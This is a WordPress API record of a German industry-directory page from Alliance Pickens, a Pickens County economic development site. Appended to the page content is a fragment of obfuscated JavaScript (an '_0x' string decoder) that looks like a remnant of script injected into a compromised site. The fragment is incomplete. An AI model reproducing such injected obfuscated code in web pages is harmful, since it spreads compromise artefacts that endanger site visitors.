{"id":6016,"date":"2020-10-28T14:29:50","date_gmt":"2020-10-28T14:29:50","guid":{"rendered":"http:\/\/alliancepickens.com\/branchenverzeichnis\/"},"modified":"2020-12-04T20:13:04","modified_gmt":"2020-12-04T20:13:04","slug":"branchenverzeichnis","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/de\/bestehende-industrien\/branchenverzeichnis\/","title":{"rendered":"Branchenverzeichnis"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Pickens County-Hersteller bedienen Kunden in den Vereinigten Staaten und auf der ganzen Welt. Lokale Unternehmen sind in einer Vielzahl wichtiger Industriesektoren t\u00e4tig, von der Automobilindustrie \u00fcber Medizinprodukte bis hin zur Luft- und Raumfahrtindustrie. Dar\u00fcber hinaus bieten Pickens County fortschrittliche Fertigungs-, fortgeschrittene Metallverarbeitung, chemische und textilverarbeitende, Kunststoffe und Verbundwerkstoffe, Spezialger\u00e4te und Softwareentwicklungsoperationen wichtige Unterst\u00fctzungsdienste in Pickens County und dar\u00fcber hinaus.<\/p>\n<p>Wenn Ihr Unternehmen an einem Umzug oder einer Expansion in Pickens County interessiert ist und Sie mehr dar\u00fcber erfahren m\u00f6chten, wie lokale Unternehmen Ihr Unternehmen unterst\u00fctzen k\u00f6nnen, wenden Sie sich bitte <a href=\"http:\/\/alliancepickens.com\/de\/ueber-uns\/#contact_directions\">an unser B\u00fcro<\/a>.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In diesem Abschnitt&#8221; nav_menu=&#8221;20&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<div>Attention: The internal data of table \u201c11\u201d is corrupted!<\/div>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/Industry-Directory-2020-10-22.csv\" target=\"_blank\" rel=\"noopener noreferrer\">Verzeichnis herunterladen<i class=\"fas fa-download\"><\/i><\/a>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][\/vc_column_inner][\/vc_row_inner][vc_empty_space height=&#8221;80px&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">Erfahren Sie mehr \u00fcber bestehende Branchen<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;20&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Bereit f\u00fcr den Einstieg?<\/h1>\n<h2>Need Subheadline<\/h2>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Kontaktieren Sie unser Team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Pickens County-Hersteller bedienen Kunden in den Vereinigten Staaten und auf der ganzen Welt. Lokale Unternehmen sind in einer Vielzahl wichtiger Industriesektoren t\u00e4tig, von der Automobilindustrie \u00fcber Medizinprodukte bis hin zur Luft- und Raumfahrtindustrie. Dar\u00fcber hinaus bieten Pickens County fortschrittliche Fertigungs-, fortgeschrittene Metallverarbeitung, chemische und textilverarbeitende, Kunststoffe und Verbundwerkstoffe, Spezialger\u00e4te und Softwareentwicklungsoperationen wichtige Unterst\u00fctzungsdienste&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":8479,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6016","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Branchenverzeichnis - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/de\/bestehende-industrien\/branchenverzeichnis\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Branchenverzeichnis - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Pickens County-Hersteller bedienen Kunden in den Vereinigten Staaten und auf der ganzen Welt. Lokale Unternehmen sind in einer Vielzahl wichtiger Industriesektoren t\u00e4tig, von der Automobilindustrie \u00fcber Medizinprodukte bis hin zur Luft- und Raumfahrtindustrie. Dar\u00fcber hinaus bieten Pickens County fortschrittliche Fertigungs-, fortgeschrittene Metallverarbeitung, chemische und textilverarbeitende, Kunststoffe und Verbundwerkstoffe, Spezialger\u00e4te und Softwareentwicklungsoperationen wichtige Unterst\u00fctzungsdienste&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/de\/bestehende-industrien\/branchenverzeichnis\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T20:13:04+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/bestehende-industrien\\\/branchenverzeichnis\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/bestehende-industrien\\\/branchenverzeichnis\\\/\",\"name\":\"Branchenverzeichnis - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\"},\"datePublished\":\"2020-10-28T14:29:50+00:00\",\"dateModified\":\"2020-12-04T20:13:04+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/bestehende-industrien\\\/branchenverzeichnis\\\/#breadcrumb\"},\"inLanguage\":\"de-DE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/de\\\/bestehende-industrien\\\/branchenverzeichnis\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/bestehende-industrien\\\/branchenverzeichnis\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Bestehende Industrien\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/bestehende-industrien\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Branchenverzeichnis\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de-DE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Branchenverzeichnis - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/de\/bestehende-industrien\/branchenverzeichnis\/","og_locale":"de_DE","og_type":"article","og_title":"Branchenverzeichnis - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Pickens County-Hersteller bedienen Kunden in den Vereinigten Staaten und auf der ganzen Welt. Lokale Unternehmen sind in einer Vielzahl wichtiger Industriesektoren t\u00e4tig, von der Automobilindustrie \u00fcber Medizinprodukte bis hin zur Luft- und Raumfahrtindustrie. Dar\u00fcber hinaus bieten Pickens County fortschrittliche Fertigungs-, fortgeschrittene Metallverarbeitung, chemische und textilverarbeitende, Kunststoffe und Verbundwerkstoffe, Spezialger\u00e4te und Softwareentwicklungsoperationen wichtige Unterst\u00fctzungsdienste&hellip;","og_url":"https:\/\/alliancepickens.com\/de\/bestehende-industrien\/branchenverzeichnis\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T20:13:04+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/de\/bestehende-industrien\/branchenverzeichnis\/","url":"https:\/\/alliancepickens.com\/de\/bestehende-industrien\/branchenverzeichnis\/","name":"Branchenverzeichnis - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/de\/#website"},"datePublished":"2020-10-28T14:29:50+00:00","dateModified":"2020-12-04T20:13:04+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/de\/bestehende-industrien\/branchenverzeichnis\/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/de\/bestehende-industrien\/branchenverzeichnis\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/de\/bestehende-industrien\/branchenverzeichnis\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/de\/"},{"@type":"ListItem","position":2,"name":"Bestehende Industrien","item":"https:\/\/alliancepickens.com\/de\/bestehende-industrien\/"},{"@type":"ListItem","position":3,"name":"Branchenverzeichnis"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/de\/#website","url":"https:\/\/alliancepickens.com\/de\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de-DE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/6016","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/comments?post=6016"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/6016\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/8479"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/media?parent=6016"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}